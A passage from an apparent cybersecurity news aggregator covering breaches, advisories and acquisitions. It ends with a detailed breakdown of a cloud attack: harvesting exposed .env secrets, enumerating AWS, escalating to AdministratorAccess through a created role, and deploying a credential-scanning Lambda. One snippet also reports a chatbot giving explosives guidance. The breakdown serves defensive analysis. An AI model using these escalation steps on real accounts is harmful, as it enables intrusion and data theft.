and the NCA likely helped prevent a catastrophic impact from the September 1 attack. Their coordination with the NCSC and other government agencies further exemplifies the value of a multi-layered defense strategy. Paul Foster''s emphasis on preventing cybercriminals from ""acting with impunity"" highlights the NCA''s proactive approach in tracking and stopping digital threats before they escalate. While public entities must invest in cybersecurity technology, law enforcement must maintain pace with cybercriminals’ evolving tactics. Beyond prevention, resilience plays a key role in mitigating the effects of cyberattacks. TfL’s immediate focus on securing its infrastructure reflects the need for rapid, well-coordinated response efforts when incidents occur. The next step will involve determining the extent of the attack and identifying long-term strategies for preventing future breaches. *Update September 13, 2:00 AM ET: The article was updated with latest announcement from Transport for London cyberattack revealing some customer data was accessed.

by The Cyber Express

We dug into PartnerLeak, the site behind the ""your partner is cheating on you"" emails, including how and where the scammers get their information.

by Malwarebytes Labs

Recently in the SOC, we were notified by a partner that they had a potential business email compromise, or BEC. We commonly catch these by identifying suspicious email forwarding rules, […] The post Monitoring High Risk Azure Logins  appeared first on Black Hills Information Security.

by Black Hills Information Security

The UK National Crime Agency has arrested and detained a suspect – a 17-year-old male in Walsall (West Midlands) – on suspicion of Computer Misuse Act offences in relation to the Transport for London (TfL) cyberattack, the agency has announced today. Also today, TfL has provided some insight into what their investigation has discovered, namely, that the attack was fist noticed on September 1 (Sunday), and that some customer data has been accessed – though … More → The post Suspect arrested over the Transport for London cyberattack appeared first on Help Net Security.

by Help Net Security

12 quarters, 100% protection.

by ThreatDown

The FBI says that 2023 was a record year for cryptocurrency fraud, with total losses exceeding $5.6 billion, based on nearly 70,000 reports received through the Internet Crime Complaint Center (IC3). [...]

by BleepingComputer

At Cloudflare, we protect customer APIs from abuse. This is no easy task, as abusive traffic can take different forms, from giant DDoS attacks to low-and-slow credential stuffing campaigns. We now address this challenge in a new way: by looking outside typical volumetric measures and using statistical machine learning to find important API client request sequences.

by Cloudflare

An explosives expert told TechCrunch that the ChatGPT output could be used to make a detonatable product and was too sensitive to be released. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Druva launched Dru Investigate, a gen AI-powered tool that guides data security investigations using a natural language interface. With Dru Investigate, users across IT, security, legal, and privacy teams can swiftly identify and mitigate data risks, without needing to write complicated queries. Built on Amazon Bedrock, an AWS service to easily build and scale generative AI applications with foundation models, Dru Investigate leverages Druva’s insights from protected data to streamline cyber and legal investigations. Data … More → The post Dru Investigate simplifies cyber investigations and helps users uncover data threats appeared first on Help Net Security.

by Help Net Security

Silver Spring, United States, 12th September 2024, CyberNewsWire

by Hackread

Understanding a threat is just as important as the steps taken toward prevention.

by Dark Reading

Learn about Sam Horvath''s journey from pentester to Managing Director at NetSPI, with cybersecurity leadership tips for aspiring technologists. The post 5 Essential Cybersecurity Leadership Tips for Technologists  appeared first on NetSPI.

by NetSPI

A new federal road map on internet routing addresses a Border Gateway Protocol (BGP) vulnerability and provides tips on how to improve internet routing security.

by ITPro Today

OpenAI has said that AI with the power to reason represents a significant step in the technology''s progress.

by ITPro Today

Cybercriminals are increasingly targeting retail affiliate programs with sophisticated cryptocurrency scams. Retailers and customers must stay alert against…

by Hackread

Mastercard goes fishing and lands threat intelligence firm Recorded Future in its net for a record deal. Global payments network Mastercard is set to acquire Recorded Future in a record deal valued at $2.65 billion. The acquisition, which is expected to close by the first quarter of 2025, pending regulatory review and standard closing conditions, will help Mastercard further fortify its cybersecurity capabilities and extend its reach into the growing threat intelligence space. Mastercard''s purchase of Boston-based Recorded Future, currently owned by private equity firm Insight Partners, reflects the credit card giant’s strategy to strengthen its digital security offerings. ""The acquisition bolsters the insights and intelligence used to secure today’s digital economy – in the payments ecosystem and beyond,"" Mastercard said in an official statement. Mastercard Acquisition for Combating Cybercrime Mastercard, which already has a range of fraud prevention and cybersecurity services that leverage artificial intelligence (AI) and other advanced technologies, views this acquisition as crucial in combating the rising tide of financial crime. The company said the acquisition would further enrich its fraud prevention tools, real-time decisioning, and cybersecurity services, expanding its ability to deliver vigorous intelligence to its network of merchants, financial institutions, and other partners. ""Trust is the foundation of any relationship. Recorded Future adds to how we deliver that greater peace of mind before, during, and after the payment transaction. Together we will innovate faster, create smarter models, and anticipate emerging threats before cyberattacks can take place – in payments and beyond,"" said Craig Vosburg, Chief Services Officer at Mastercard. Founded in 2009, Recorded Future serves over 1,900 clients across 75 countries and has a clientele that includes federal governments and several Fortune 500 companies. The firm provides real-time visibility into potential cyber threats by analyzing an expansive set of data sources. This insight allows its customers to preemptively address risks, a capability that Mastercard sees as essential to securing the broader digital economy, particularly in the payments sector. Recorded Future’s ability to gather and analyze a vast array of data using AI aligns with Mastercard''s strategy of deploying advanced technology to stay ahead of evolving cyber threats. By acquiring Recorded Future, Mastercard is not only broadening its own cybersecurity portfolio but also reinforcing its position as a leader in digital trust and security. Synergies Between AI and Threat Intelligence Both Mastercard and Recorded Future are at the forefront of leveraging AI to enhance cybersecurity. The two companies currently collaborate on an AI-supported service that alerts financial institutions more quickly and accurately when a payment card is likely to have been compromised. Bringing Recorded Future’s AI-driven threat intelligence under Mastercard’s umbrella will likely result in enhanced products and services for customers, who will benefit from the combined expertise in cybersecurity and intelligence. Mastercard’s global network and reach present an opportunity for Recorded Future to scale its operations and further develop its technology. Christopher Ahlberg, CEO of Recorded Future, expressed optimism about the deal: “Fifteen years ago, we created Recorded Future with a simple goal to secure the world with intelligence. By joining Mastercard, we see an opportunity to help more businesses and governments determine the steps to realize their full potential – and to enable everyone to feel safer in their daily lives.” Positioning for the Future of Digital Security The acquisition comes at a time when cybercrime is at an all-time high, with threats becoming more advanced and extensive. The rise in digital transactions, the expansion of e-commerce, and the increased reliance on online services have created new vulnerabilities that businesses and governments alike are struggling to address. Mastercard’s investment in Recorded Future reflects a growing recognition that proactive threat intelligence is essential in mitigating these risks. Mastercard has been steadily building its cybersecurity portfolio over the years, with acquisitions and partnerships designed to enhance its fraud prevention and risk management capabilities. Last year, Mastercard acquired Swedish firm Baffin Bay Networks that provides threat protection service, to stop attackers from penetrating or taking down cyber systems. Before that, in 2019, the payments giant acquired RiskRecon a pioneering scanning and evaluation technologies company that helped proactively manage cyber risks, better safeguarding critical intellectual property and consumer and payment data. This latest acquisition signals the company’s intent to play a larger role in shaping the future of cybersecurity, particularly in the payments ecosystem, where trust and security are paramount. The deal also highlights the increasing importance of threat intelligence in the broader digital world.

by The Cyber Express

Saviynt, a leading provider of cloud-native identity and governance platform solutions, has announced the launch of its highly anticipated Intelligence Suite, which includes the general availability of Intelligent Recommendations. This new offering promises to revolutionize identity security with its advanced features, including dynamic role management, tailored access recommendations, actionable insights, and a multi-dimensional weighted trust […] The post Saviynt Launches Innovative Intelligence Suite to Transform Identity Security appeared first on IT Security Guru.

by IT Security Guru

Artificial intelligence and machine learning are becoming increasingly crucial to cybersecurity systems. Organizations need professionals with a strong background that mixes AI/ML knowledge with cybersecurity skills, bringing on board people like Nicole Carignan, Vice President of Strategic Cyber AI at Darktrace, who has a unique blend of technical and soft skills. Carignan was originally a […] The post How I got started: AI security executive appeared first on Security Intelligence.

by Security Intelligence

Kransom ransomware hides within the StarRail game using DLL side-loading and a legitimate certificate from COGNOSPHERE PTE. LTD.…

by Hackread

For legitimate purposes, these VPNs are the best options available for supporting safe, secure, and speedy downloads.

by ZDNET Security

Fortinet, a major player in the global cybersecurity sector, has disclosed a data breach involving a third-party service, affecting a small number of its Asia-Pacific customers. The breach reportedly exposed limited customer data stored on a cloud-based shared file drive used by Fortinet. However, a hacker, operating under the alias “Fortibitch,” has claimed responsibility for … The post Fortinet Confirms Third-Party Data Breach Amid Hacker’s 440 GB Theft Claim appeared first on CyberInsider.

by Cyber Insider

Programmers, the behind-the-scenes innovators driving technological progress, are honored on International Programmers'' Day, observed on the 256th day of each year, to recognize their invaluable contributions.

by ITPro Today

by ComputerWeekly

by ComputerWeekly

Users have reported three issues: files randomly disappearing, phantom notifications for messages that don''t exist, and persistent audio feedback during meetings.

by ITPro Today

This article will focus on the Phishing Chronology. Analyzing 88014 phishing URLs collected from public sources and Zimperium data, we will show how dynamic and fast evolving are the phishing threats.  The post A Network of Harm: Gigabud Threat and Its Associates appeared first on Zimperium.

by Zimperium

WordPress.org has announced a new account security measure that will require accounts with capabilities to update plugins and themes to activate two-factor authentication (2FA) mandatorily. The enforcement is expected to come into effect starting October 1, 2024. ""Accounts with commit access can push updates and changes to plugins and themes used by millions of WordPress sites worldwide,"" the

by The Hacker News

Claroty warned the prevalence of remote access tool sprawl, often linked to ransomware, raises the risk of malicious activity.

by Cybersecurity Dive

A vendor honeypot caught two attacks intended to leverage the tens of thousands of exposed Selenium Grid Web app testing servers.

by Dark Reading

The Vision Pro uses 3D avatars on calls and for streaming. These researchers used eye tracking to work out the passwords and PINs people typed with their avatars.

by WIRED Security News

Barracuda threat analysts have recently identified a rise in phishing attacks that leverage trusted content creation and collaboration platforms popular with schools and designers as well as businesses.

by Barracuda

The European Union’s (EU’s) Network and Information Systems 2 (NIS2) Directive marks a critical advancement in the EU’s digital regulatory policy. Expanding and improving on its predecessor legislation, NIS2 sets out to implement a consolidated, harmonized, and enhanced cybersecurity regime for EU member states. Here’s what you need to know. Scope and Applicability The new […] The post Unlocking Cyber Resilience: How NIS2 Transforms Cyber Threat Intelligence appeared first on ThreatMon Blog.

by ThreatMon

The rebound arrives as heightened levels of malicious activity are targeting firewalls, the largest product segment in the market.

by Cybersecurity Dive

Seven critical-severity vulnerabilities addressed, including an extraordinary (but narrow) Windows Update flaw

by Sophos News

by ComputerWeekly

With an immature codebase and a "rather chaotic encryption scheme" prone to failure, the group targets small businesses with custom malware.

by Dark Reading

Torrance, United States / California, 12th September 2024, CyberNewsWire

by Hackread

The Institute for Security and Technology''s UnDisruptable27 project connects technology firms with the public sector to strengthen US cyber defenses in case of attacks on critical infrastructure.

by Dark Reading

The latest step in a journey to serve cybersecurity professionals in other regions of the world.

by Dark Reading

After three years of development, the portable hacking tool gets its first major firmware update - to version 1.0!

by ZDNET Security

<p>We're back with another post about common malware techniques. This time we are talking about setting Windows hooks. This is a simple technique that can be used to log keystrokes or inject code into remote processes. We…</p>

by TrustedSec

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 9.8. The following CVEs are assigned: CVE-2024-29847.

by Zero Day Initiative Advisories

The operators of the mysterious Quad7 botnet are actively evolving by compromising several brands of SOHO routers and VPN appliances by leveraging a combination of both known and unknown security flaws. Targets include devices from TP-LINK, Zyxel, Asus, Axentra, D-Link, and NETGEAR, according to a new report by French cybersecurity company Sekoia. ""The Quad7 botnet operators appear to be

by The Hacker News

A ""simplified Chinese-speaking actor"" has been linked to a new campaign that has targeted multiple countries in Asia and Europe with the end goal of performing search engine optimization (SEO) rank manipulation. The black hat SEO cluster has been codenamed DragonRank by Cisco Talos, with victimology footprint scattered across Thailand, India, Korea, Belgium, the Netherlands, and China. ""

by The Hacker News

Private Cloud Compute is an entirely new kind of infrastructure that, Apple’s Craig Federighi tells WIRED, allows your personal data to be “hermetically sealed inside of a privacy bubble.”

by WIRED Security News

Key Findings Introduction Check Point Research (CPR) has been closely monitoring a campaign targeting the Iraqi government over the past few months. This campaign features a custom toolset and infrastructure for specific targets and uses a combination of techniques commonly associated with Iranian threat actors operating in the region. The toolset used in this targeted […] The post Targeted Iranian Attacks Against Iraqi Government Infrastructure appeared first on Check Point Research.

by Check Point Research

The recent ransomware attack on the Los Angeles County Superior Court system has gotten a lot of press coverage, and overall, the consensus seems to be that it was devastating. Read more about it in this blog.

by Barracuda

Researchers at Bitdefender warn that law firms are high-value targets for ransomware gangs and other criminal threat actors. Attackers frequently use phishing to gain initial access to an organization’s networks.

by KnowBe4

by ComputerWeekly

DragonRank, a Chinese-speaking hacking group, has compromised 30+ Windows servers globally. They exploit IIS vulnerabilities to manipulate SEO…

by Hackread

Intel has issued a security advisory addressing several critical vulnerabilities in the UEFI firmware of certain processors. These flaws, if exploited, could allow privileged users to escalate privileges, launch denial-of-service (DoS) attacks, or even leak sensitive information. Affected users will need to wait for system manufacturers to distribute the necessary firmware updates, which may take … The post Intel’s UEFI Firmware Update Addresses Flaws on Millions of Devices appeared first on CyberInsider.

by Cyber Insider

Attackers mimic Office 365 security alert notifications to lure victims to a phishing site.

by Kaspersky

The Singapore Police Force (SPF) has announced the arrest of five Chinese nationals and one Singaporean man for their alleged involvement in illicit cyber activities in the country. The development comes after a group of about 160 law enforcement officials conducted a series of raids on September 9, 2024, simultaneously at several locations. The six men, aged between 32 and 42, are suspected of

by The Hacker News

AI improves data visualization by enhancing automation, personalization, and collaboration, while introducing techniques like augmented reality and real-time data streams.

by ITPro Today

Business intelligence firm Gartner labels security orchestration, automation, and response as "obsolete," but the fight to automate and simplify security operations is here to stay.

by Dark Reading

by Dark Reading

by Dark Reading

Imagine a world where you never have to remember another password. Seems like a dream come true for both end users and IT teams, right? But as the old saying goes, ""If it sounds too good to be true, it probably is.""  If your organization is like many, you may be contemplating a move to passwordless authentication. But the reality is that a passwordless security approach comes with its own

by The Hacker News

Key Takeaways Three major advisories from CISA address 17 vulnerabilities across products from LOYTEC Electronics GmbH, Hughes Network Systems, and Baxter. Multiple products are affected by vulnerabilities allowing for the cleartext transmission of sensitive data, such as passwords, which could be exploited through Man-in-the-Middle (MitM) attacks. Despite being reported in 2021, these vulnerabilities are now publicly disclosed due to the vendor''s lack of response. With 629 internet-exposed instances, primarily in Italy and France, the likelihood of exploitation is high. Proof of Concepts (PoCs) for these vulnerabilities is publicly available. Other notable vulnerabilities include insufficiently protected credentials and SQL injection, affecting critical infrastructure systems. Overview The Cybersecurity and Infrastructure Security Agency (CISA) has highlighted multiple vulnerabilities in ICS products from LOYTEC Electronics GmbH, Hughes Network Systems, and Baxter. Cyble Research & Intelligence Labs (CRIL) stressed critical vulnerabilities and threats identified between September 03, 2024, and September 09, 2024. These vulnerabilities span a range of severity levels and impact various products from LOYTEC Electronics GmbH, Hughes Network Systems, and Baxter. Multiple vulnerabilities have been identified in LOYTEC Electronics GmbH''s product line. These issues primarily involve the cleartext transmission and storage of sensitive information, along with missing authentication for critical functions and improper access control. Specifically, CVE-2023-46380, CVE-2023-46382, CVE-2023-46383, and CVE-2023-46385 are high-severity vulnerabilities that expose sensitive data such as passwords to potential interception through Man-in-the-Middle (MitM) attacks. These vulnerabilities affect multiple products, including LINX-151, LINX-212, LVIS-3ME12-A1, and various models within the LIOB and L-INX Configurator series. For instance, CVE-2023-46380 and CVE-2023-46382 both deal with cleartext transmission of sensitive information. The risk associated with these vulnerabilities is significant because attackers can intercept and read sensitive data sent over the network. Exploiting CVE-2023-46384 and CVE-2023-46386, which involve cleartext storage of sensitive information, further compounds the risk, as attackers gaining access to these stored data could potentially exploit it for unauthorized purposes. Additionally, CVE-2023-46381 and CVE-2023-46387 address missing authentication and improper access control issues. These vulnerabilities allow unauthorized access to critical functions and systems, which can lead to broader system compromises if exploited. The absence of proper authentication mechanisms in these cases means that attackers could bypass security measures and gain unauthorized control. Hughes Network Systems Vulnerabilities Hughes Network Systems'' WL3000 Fusion Software is affected by two medium-severity vulnerabilities. CVE-2024-39278 and CVE-2024-42495 highlight insufficiently protected credentials and missing encryption of sensitive data, respectively. CVE-2024-39278 exposes credentials that are not adequately protected, which could be intercepted and misused by attackers. On the other hand, CVE-2024-42495 involves missing encryption for sensitive data, increasing the risk of data breaches and unauthorized access. These vulnerabilities affect versions of the software before 2.7.0.10, emphasizing the importance of updating to the latest versions to mitigate these risks. Baxter Vulnerabilities Baxter''s Connex Health Portal has been identified with critical and high-severity vulnerabilities. CVE-2024-6795 is a critical SQL injection vulnerability that affects all versions of the Connex Health Portal, released before August 30, 2024. SQL injection vulnerabilities allow attackers to execute arbitrary SQL commands on the database, potentially leading to unauthorized data access or modification. In addition, CVE-2024-6796 involves improper access control, which can result in unauthorized access to sensitive application areas. Both vulnerabilities necessitate immediate patching and updates to protect against potential exploits. The vulnerabilities identified across these ICS products highlight critical risks that need prompt attention. For LOYTEC Electronics GmbH products, the issues primarily involve data security flaws, while Hughes Network Systems and Baxter face vulnerabilities that affect credential protection and data encryption. Organizations using these systems should prioritize applying available patches and updates, implementing robust access controls, and enhancing their security posture to mitigate the risks posed by these vulnerabilities. The majority of disclosed vulnerabilities are categorized as high severity, emphasizing the critical need for prompt action and mitigation. Conclusion These vulnerabilities highlight critical security issues in ICS products from LOYTEC Electronics GmbH, Hughes Network Systems, and Baxter. Key vulnerabilities include cleartext transmission of sensitive data, SQL injection, and improper access controls, all of which pose significant risks. Organizations must act quickly by applying patches, enhancing access controls, and improving security monitoring. These steps are crucial to mitigating the identified risks and protecting critical infrastructure from exploitation. Mitigations and Recommendations Implement network segmentation to isolate ICS networks from corporate and internet networks. Use firewalls and DMZs to manage traffic between segments. Apply strong, multifactor authentication and limit access based on the principle of least privilege. Keep ICS hardware and software updated with the latest patches to defend against known vulnerabilities. Deploy monitoring tools to detect suspicious activities and maintain logs for forensic investigations. Develop and test an ICS-specific incident response plan for effective handling of security incidents. Educate staff on ICS-specific threats and best practices, emphasizing the risks of social engineering and untrusted software sources. Sources https://www.cisa.gov/news-events/ics-advisories/icsa-24-247-01 https://www.cisa.gov/news-events/ics-advisories/icsa-24-249-01 https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-249-01 The post Major ICS Security Flaws Disclosed in LOYTEC, Hughes, and Baxter Products appeared first on Cyble.

by CYBLE

CVE-2024-38257 is considered “less likely” to be exploited, though it does not require any user interaction or user privileges.

by Cisco Talos Blog

See how the first 2024 US presidential debate between Kamala Harris and Donald Trump influenced Internet traffic patterns compared to the Biden-Trump debate. We also review email trends and observed attack activity.

by Cloudflare

by Dark Reading

Cybersecurity researchers have uncovered a new set of malicious Python packages that target software developers under the guise of coding assessments. ""The new samples were tracked to GitHub projects that have been linked to previous, targeted attacks in which developers are lured using fake job interviews,"" ReversingLabs researcher Karlo Zanki said. The activity has been assessed to be part of

by The Hacker News

Tired of being tracked online? Try ditching Google for the oddly named DuckDuckGo. Here''s why you probably won''t switch back.

by ZDNET Security

The Rise of Bug Bounty Programs in S-1 Filings: A New Standard in Corporate Security Jobert Abma Wed, 09/11/2024 - 11:20 Body Learn more about bug bounty programs and how they work >The Growing TrendAt HackerOne, we’ve observed a notable increase in companies mentioning their bug bounty programs in S-1 filings. Some of the prominent names that have included this information are:AsanaBackblazeBill.comContextLogicCventDoximityTuroGitLabGoodRxOutbrainRobloxSamsara""We included our HackerOne bug bounty program as part of our S1-filing to demonstrate our stance on security. Compliance and attestation reports only go so far, and having a dedicated bug bounty program is very valuable for catching vulnerabilities early, which was worth highlighting in our S1.""— Jey Balachandran, Chief Technology Officer, DoximityThis list represents a diverse range of industries, from tech and healthcare to finance and travel, indicating that bug bounty programs are becoming a cross-sector security standard.Why Include Bug Bounty in S-1 FilingsThe inclusion of bug bounty programs in S-1 filings is more than just a footnote; it’s a clear message to investors and the public about an organization’s commitment to cybersecurity. It emphasizes that the organization is invested in:Transparency: By disclosing their bug bounty efforts, organizations demonstrate transparency about their security practices.Proactive Approach: It shows that these organizations are taking proactive steps to identify and address potential vulnerabilities.Community Engagement: Bug bounty programs indicate a willingness to engage with the broader security community, leveraging collective expertise.Risk Management: For investors, this information provides insight into how an organization manages cybersecurity risks.The Future of Bug Bounty Programs in Corporate DisclosuresWe anticipate this trend to continue and even accelerate in the coming years. As cyber threats evolve and become more sophisticated — and investors place greater emphasis on proactive security engagements — organizations will need to showcase their security initiatives in their corporate disclosures.Governing agencies also play a significant role in the requirements regarding corporate disclosure. As regulators become more attuned to cybersecurity risks and put stricter standards in place for compliance, disclosing such programs may become not just a nice-to-have but a requirement in S-1 filings and other corporate communications.A Sign of Serious Security CommitmentBy including your bug bounty program in your S-1 filing, your organization demonstrates you take security seriously — the security of your investors, customers, employees, and partners. Signal to every involved party that your organization is:Invested in cutting-edge security practicesOpen to external scrutiny and improvementCommitted to ongoing security enhancementsAligned with industry best practicesIn conclusion, the growing trend of organizations mentioning their bug bounty programs in S-1 filings represents a significant shift in corporate security culture. As this trend continues, we expect to see bug bounty programs become an integral part of how companies communicate their security posture to the world. If you’re interested in incorporating bug bounty into your upcoming corporate filing, learn more about bug bounty programs with HackerOne. Excerpt Learn why more organizations are including their bug bounty programs in S-1 filings and other corporate disclosures. Main Image

by HackerOne

A veritable grab bag of tools used to access critical infrastructure networks are wildly insecure, and they''re blobbing together to create a widening attack surface.

by Dark Reading

The threat of ransomware hasn''t gone away. But law enforcement has struck a blow by adjusting its tactics and taking out some of the biggest adversaries in the ransomware scene.

by Dark Reading

Ivanti has released a fix for CVE-2024-29847, a deserialization of untrusted data flaw that allows remote code execution in its Endpoint Management solution.

by ThreatDown

The European Court of Justice said Apple must repay about $14.35 billion after reaping illegal tax benefits in Ireland and backed a $2.65 billion antitrust fine on Google.

by ITPro Today

South Africa’s cybersecurity workforce shortage mirrors global trends, but also faces local factors like underinvestment in basic education, underserved communities, digital literacy gaps and challenges with data access.

by KnowBe4

The Better Business Bureau (BBB) has observed a six-fold increase in losses from investment scams over the past three years. The BBB has received more than 4,000 reports of investment scams since 2020, with the median reported loss rising from $1,000 in 2021 to almost $6,000 in 2024.

by KnowBe4

In the "PixHell" attack, sound waves generated by pixels on a screen can transmit information across seemingly impenetrable air gaps.

by Dark Reading

This post explains how our integrations with CrowdStrike Falcon® Next-Gen SIEM allow customers to identify and investigate risky user behavior and analyze data combined with other log sources to uncover hidden threats.

by Cloudflare

Microsoft’s September Patch Tuesday covers 79 Microsoft CVEs and includes four actively exploited zero-days.

by ThreatDown

Cybercriminals target Trump’s digital trading cards using phishing sites, fake domains, and social engineering tactics to steal sensitive…

by Hackread

To maximize the benefits of generative AI, organizations should empower employees to innovate, gain leadership buy-in, promote internal awareness, and measure outcomes.

by ITPro Today

Security researchers from WatchTowr Labs accidentally took over the defunct domain of the WHOIS server for the .MOBI top-level domain (TLD), unveiling a major vulnerability in internet infrastructure. With just $20, the team not only achieved remote code execution (RCE) but also undermined the TLS/SSL certificate validation process for the entire .MOBI domain, effectively gaining … The post $20 Domain Purchase Exposed .MOBI’s Critical Security Flaw appeared first on CyberInsider.

by Cyber Insider

Audit your AD environment for misconfigurations (and attacks) that can lead to severe consequences when exploited by malicious actors.

by Hack The Box Blog

The five-year investment by AWS in data centers will support up to 14,000 jobs.

by ITPro Today

Microsoft on Tuesday disclosed that three new security flaws impacting the Windows platform have come under active exploitation as part of its Patch Tuesday update for September 2024. The monthly security release addresses a total of 79 vulnerabilities, of which seven are rated Critical, 71 are rated Important, and one is rated Moderate in severity. This is aside from 26 flaws that the tech

by The Hacker News

Ivanti has released software updates to address multiple security flaws impacting Endpoint Manager (EPM), including 10 critical vulnerabilities that could result in remote code execution. A brief description of the issues is as follows - CVE-2024-29847 (CVSS score: 10.0) - A deserialization of untrusted data vulnerability that allows a remote unauthenticated attacker to achieve code execution.

by The Hacker News

When a website is compromised, it becomes a potential threat to visitors, leading to its inclusion in Google’s Safe Browsing blacklist…Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

Large-Scale Data Exfiltration: Exploiting Secrets in .env Files to Compromise Cloud Accounts and Inflict Severe Business DegradationPart 1: Breach AnalysisLarge-Scale Data Exfiltration Attack: High Level OverviewResearchers from Palo Alto Networks’ Unit 42 have uncovered a major cyber attack targeting cloud environments by exploiting sensitive secrets stored in .env files.The investigation concluded that a compromised AWS environment had been exploited to conduct internet-wide scans across various domains as part of this malicious campaign. Unit 42 discovered that the threat actors had gathered .env files from approximately 110,000 domains, exposing over 90,000 sensitive credentials, including 7,000 related to cloud services used by various organizations.The following article offers a detailed breakdown of techniques used by attackers in this malicious operation. I will explore the 5 phases of the attack — Initial Access, Account Discovery, Privilege Escalation, Malicious Execution, and Data Exfiltration — along with 12 micro-steps that propel these 5 phases.Phase 1: Initial AccessAttackers gained initial access to victims’ cloud environments by exploiting exposed secrets in .env files. These files are used by services to access runtime environment variables, which are typically configured differently across development, staging, and production environments based on where the service is deployed.In production environments, .env files often contain highly sensitive information, such as access tokens, credentials, and API keys. Due to their sensitive nature, .env files are generally excluded from code repositories and are manually configured for specific instances..env files are often used to configure web servers that host customer-facing web applications. If improperly configured, attackers can access them publicly via http[s]://<domain>/.env, potentially leading to the retrieval of the .env file contents, which hold sensitive authentication assets used in production.Phase 1 — Initial Access via Exploited Secrets in .env FilesPhase 2: Account DiscoveryAfter scanning an unsecured web server, the attackers used AWS access keys, obtained from a publicly accessible .env file, to learn more about the compromised account.AWS access keys are long-term credentials for AWS IAM users, consisting of two parts: an access key ID and a secret access key. Together, these credentials allow authentication of AWS API requests on behalf of the IAM user associated with the access keys. NOTE: AWS access keys are not considered a best practice from a security perspective. Instead, developers are encouraged to use temporary security credentials (such as AWS IAM roles) rather than long-term credentials.Using the AWS access keys, the threat actors gained a foothold in the AWS environment and sought to learn more about the compromised account. This tactic allowed them to advance their malicious operations — escalating privileges, moving laterally, and extracting valuable data. The attackers made several AWS API calls across several services:Phase 2 — Scanning the Compromised AWS AccountStep 1 —AWS Security Token Service (STS): Attackers called the STS GetCallerIdentity API to get details about the IAM entity whose AWS access keys are used to invoke the API. It returns the UserID, which represents the unique identifier of the calling entity; the Account, which represents the account that owns the calling entity; and the ARN associated with the calling entity. NOTE: no permissions are required to perform this kind of operation.Step 2 — AWS Identity & Access Management (IAM): Attackers called the IAM ListUsers API to obtain details about all IAM users in the AWS user pool, along with their IAM attributes. It enabled them to find potential user entities to exploit for future lateral movement.Step 3 — AWS Simple Storage Service (S3): Attackers called the S3 ListBuckets API to obtain a list of all S3 buckets owned by the calling entity of the request. It enabled them to find potential S3 buckets for future data exfiltration operations. NOTE: a calling entity must have the s3:ListAllMyBuckets permission to perform this operation.While a basic scan of the compromised account was possible, the threat actors needed administrator access to allocate compute resources and execute code. Therefore, they proceeded to carry out a privilege escalation.Phase 3: Privilege EscalationThe threat actors wanted to execute code in the compromised account, but the IAM credentials used for initial access had insufficient privileges. Therefore, they performed a privilege escalation to carry out further malicious actions.Low-privileged IAM principals have limited permissions, restricting their access to critical resources. By escalating privileges, attackers could gain elevated access (targeting the AdministratorAccess AWS-managed IAM policy), allowing them to bypass security controls, move laterally within the cloud environment, and ultimately, exfiltrate data from sensitive S3 buckets.To escalate their privileges, the threat actors created a new AWS IAM role, assigned it elevated permissions, and assumed the role to obtain elevated IAM credentials.To better understand this escalation pattern, we first need to take a closer look at the structure of an AWS IAM role.3.1. Structure of an AWS IAM Role — Trust and Permission PoliciesAWS IAM roles are entities that grant access to AWS services based on assigned permissions, similar to IAM users. However, unlike users, roles do not have passwords or access keys. Instead, they provide temporary security credentials to whoever assumes them. This reduces the need to manage users and their long-term credentials, as roles generate temporary credentials whenever required, just in time (JIT), while aiming to provide just enough access (JEA).AWS IAM roles consist of two components:Appendix A — Structure of an AWS IAM RoleTrust policies are designed to prevent unauthorized or unintended entities from misusing the IAM role. These policies define the trust relationship between the role and the entities permitted to assume it. Principals allowed to assume the role span IAM users, IAM roles, AWS services, or federated identities from an identity provider (IdP).Permission policies specify what actions IAM principals can perform on AWS services and resources once they assume the IAM role. NOTE: Multiple permission policies can be attached to an entity to grant varying levels of access rights.With a clearer understanding of the structure of an AWS IAM role, we can now dive into the AWS IAM privilege escalation technique involving the CreateRole and AttachRolePolicy APIs.3.2. Escalating Privileges using CreateRole and AttachRolePolicyTo escalate their privileges, the attackers created IAM resources with unrestricted access to the victim’s AWS resources. They created an IAM role named lambda-ex, attached elevated permissions to it, and assumed the role to obtain temporary IAM credentials.Phase 3 — Escalating Privileges via an Elevated IAM RoleStep 4 — Create a new IAM role: The attackers used the IAM CreateRole API to create a new IAM role named lambda-ex in the compromised AWS account, with an AssumeRolePolicyDocument (trust policy) that granted their own calling identity permission to assume the role.Step 5— Attach an elevated IAM policy to the IAM role: The attackers used the IAM AttachRolePolicy API to attach the AWS-managed AdministratorAccess IAM policy to the lambda-ex role, making that policy a part of the role’s permission policy.Step 6 — Assume the IAM role: The attackers used the STS AssumeRole API with the te RoleArn corresponding to the newly created lambda-ex role, which had the AdministratorAccess AWS-managed policy attached, to obtain a set of temporary IAM credentials that provided unrestricted access to AWS resources in the victim’s AWS account.With IAM credentials granting unrestricted access to the compromised AWS account, the threat actors could execute code by creating an AWS lambda function that executes their malicious code.Phase 4: Malicious ExecutionUsing the temporary and elevated IAM credentials, the threat actors created a new lambda function named ex in the AWS region us-east-1. This lambda function executed a bash script that scanned internet-wide domains for exposed .env files, extracted credentials from them, and uploaded the credentials to an S3 bucket under their control.This technique enabled the attackers to compromise more AWS accounts by using similar attack vectors to exfiltrate and delete S3 objects from the targeted victims’ buckets. They could then upload a ransom note to the emptied buckets, demanding a large fee for returning the exfiltrated data. To execute maliciously, the lambda function had permission to interact with the attackers’ controlled S3 bucket.NOTE: An AWS lambda function requires specific permissions to execute API actions and access other AWS resources. These permissions are defined in an IAM role called an execution role, which lambda automatically assumes when invoked. The execution role can have a policy attached that specifies the necessary permissions for accessing AWS resources. At a minimum, it must have access to Amazon CloudWatch, as Lambda logs there by default (attaching the AWSLambdaBasicExecutionRole policy satisfies this requirement). Additionally, the role’s trust policy must include the lambda service principal (lambda.amazonaws.com) to allow Lambda to assume the role.Phase 4 — Executing Malicious Code by Launching an AWS LambdaStep 7— Create a new AWS lambda function: The attackers used the AWS Lambda CreateFunction API to create a new lambda function named ex in the compromised AWS account, using an ExecutionRole that granted access to the attackers’ controlled S3 bucket.Step 8 (Implicit) — Create a new Amazon CloudWatch log group: The creation of an AWS lambda function automatically triggers an Amazon CloudWatch CreateLogGroup API call, which, in this case, creates a log group named /aws/lambda/ex to host log streams generated by the malicious function. This is followed by a CreateLogStream API call, which creates the first log stream within the log group to aggregate runtime log events by date. NOTE: The 